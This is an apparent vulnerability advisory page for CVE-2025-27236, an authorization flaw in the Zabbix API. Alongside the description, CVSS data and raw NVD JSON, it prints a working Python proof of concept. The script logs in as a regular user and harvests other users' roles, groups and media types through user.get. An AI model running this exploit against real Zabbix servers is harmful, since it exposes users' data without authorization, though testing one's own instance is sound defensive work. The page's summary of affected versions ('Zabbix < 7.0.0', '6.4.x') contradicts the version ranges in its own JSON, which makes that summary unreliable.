Security Vulnerability Report
CVE-2025-27236 CVSS 6.5 MEDIUM

CVE-2025-27236

Published: 2025-10-03 12:15:44
Last Modified: 2025-10-08 14:54:42

Description

A regular Zabbix user can search other users in their user group via the Zabbix API by selecting fields the user does not have access to view. This allows data-mining of some field values the user does not have access to.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zabbix:zabbix:7.4.0:-:*:*:*:*:*:* - VULNERABLE
Zabbix < 7.0.0
Zabbix 6.0.x (affected version range)
Zabbix 6.4.x (affected version range)
Zabbix 7.0.x (affected version range)
The exact affected ranges are given by the versionStartIncluding / versionEndExcluding entries in the Raw JSON Data section below.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
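# CVE-2025-27236 PoC - Zabbix API Unauthorized Field Access
# This PoC demonstrates how a regular Zabbix user can access
# fields they are not authorized to view via the user.get API method.
#
# Intended use: checking whether an instance you administer is affected
# (see the versionStartIncluding / versionEndExcluding ranges in the Raw
# JSON Data on this page) before and after applying the vendor fix
# tracked as ZBX-27060. The script only uses the caller's own
# low-privilege credentials against the configured API endpoint.
import json

import requests

# Zabbix server configuration -- replace with the instance under test.
ZABBIX_URL = "https://zabbix-server.example.com/api_jsonrpc.php"
USERNAME = "regular_user"
PASSWORD = "user_password"

# TLS certificate verification stays ON. The original script passed
# verify=False, which accepts any certificate and exposes the login
# credentials and session token to interception; for a lab host with a
# self-signed certificate point this at the CA bundle path rather than
# setting it to False.
VERIFY_TLS = True

# Bound every request so a stalled server cannot hang the script; the
# original had no timeout at all.
TIMEOUT_SECONDS = 15


def api_call(payload):
    """POST one JSON-RPC payload to ZABBIX_URL and return the decoded body.

    Raises requests.HTTPError on a non-2xx status and ValueError when the
    body is not JSON, so a transport failure is not mistaken for an
    API-level result.
    """
    response = requests.post(
        ZABBIX_URL, json=payload, verify=VERIFY_TLS, timeout=TIMEOUT_SECONDS
    )
    response.raise_for_status()
    return response.json()


# Step 1: Authenticate and obtain API token
auth_payload = {
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {"username": USERNAME, "password": PASSWORD},
    "id": 1,
}
auth_result = api_call(auth_payload)
auth_token = auth_result.get("result")
if not auth_token:
    # The original went on to send "auth": None after a failed login;
    # stop here and surface the JSON-RPC error object instead.
    raise SystemExit(f"[-] Login failed: {auth_result.get('error')}")
# Do not echo the full session token to stdout/logs; a prefix is enough
# to confirm that login succeeded.
print(f"[+] Obtained auth token: {auth_token[:4]}...")

# Step 2: Search users with select* parameters for fields the caller is
# not authorized to view (CWE-863, incorrect authorization in user.get).
# The field list is unchanged from the original report.
exploit_payload = {
    "jsonrpc": "2.0",
    "method": "user.get",
    "params": {
        "output": ["userid", "username", "name", "surname"],
        # Select sensitive fields that the user should not have access to
        "selectRole": "extend",
        "selectMediatypes": "extend",
        "selectUsrgrps": "extend",
        "selectProvisioned": "extend",
    },
    "auth": auth_token,
    "id": 2,
}
result = api_call(exploit_payload)

# Step 3: Report what came back. On an affected instance the select*
# sub-objects are populated for other users in the caller's group; what a
# fixed instance returns instead (error vs. stripped fields) is not
# stated on this page -- confirm against the vendor advisory (ZBX-27060).
if "result" in result:
    print("[+] Sensitive user data obtained via unauthorized field access:")
    for user in result["result"]:
        print(f"\nUser: {user.get('username')}")
        print(f" Role: {user.get('role')}")
        print(f" User Groups: {user.get('usrgrps')}")
        print(f" Media Types: {user.get('mediatypes')}")
        # Additional sensitive fields that should not be accessible
        print(f" Full Data: {json.dumps(user, indent=2)}")
else:
    print(f"[-] Error: {result.get('error')}")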

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27236", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:43.790", "lastModified": "2025-10-08T14:54:42.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A regular Zabbix user can search other users in their user group via Zabbix API by select fields the user does not have access to view. This allows data-mining some field values the user does not have access to."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": 
"NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.38", "versionEndExcluding": "6.0.41", "matchCriteriaId": "9C73E57A-771E-49D7-9D49-D46513A76D71"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.9", "versionEndExcluding": "7.0.17", "matchCriteriaId": "6A20277F-9A7E-410F-86F0-9E591E1E9089"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.3", "versionEndExcluding": "7.2.11", "matchCriteriaId": "01B49CD8-1065-4774-BDC7-3BF9644039E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:7.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "8AC63758-0D3C-47D2-8895-2C973E10BEE3"}]}]}], "references": [{"url": "https://support.zabbix.com/browse/ZBX-27060", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}